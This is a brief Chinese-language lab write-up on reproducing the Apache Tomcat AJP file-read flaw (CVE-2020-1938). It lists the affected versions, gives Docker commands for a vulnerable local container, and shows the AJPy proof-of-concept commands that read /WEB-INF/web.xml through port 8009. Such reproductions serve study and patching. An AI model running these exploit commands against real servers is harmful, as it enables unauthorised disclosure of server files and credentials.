前言
影响
Apache Tomcat = 6
7 <= Apache Tomcat <7.0.100
8 <= Apache Tomcat <8.5.51
9 <= Apache Tomcat <9.0.31
编号
CNVD-2020-10487
CVE-2020-1938
环境搭建
启动docker
systemctl start docker
查找容器
docker search tomcat-8.5.32
下载容器
docker pull duonghuuphuc/tomcat-8.5.32
启动容器
docker run -d -p 8080:8080 -p 8009:8009 duonghuuphuc/tomcat-8.5.32
查看容器
docker ps
访问
http://127.0.0.1:8080/
漏洞复现
poc下载地址
https://github.com/hypn0s/AJPy
git clone https://github.com/hypn0s/AJPy.git
cd AJPy
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
python tomcat.py version 127.0.0.1
参考文章
https://github.com/hypn0s/AJPy
https://www.liuyixiang.com/post/109123.html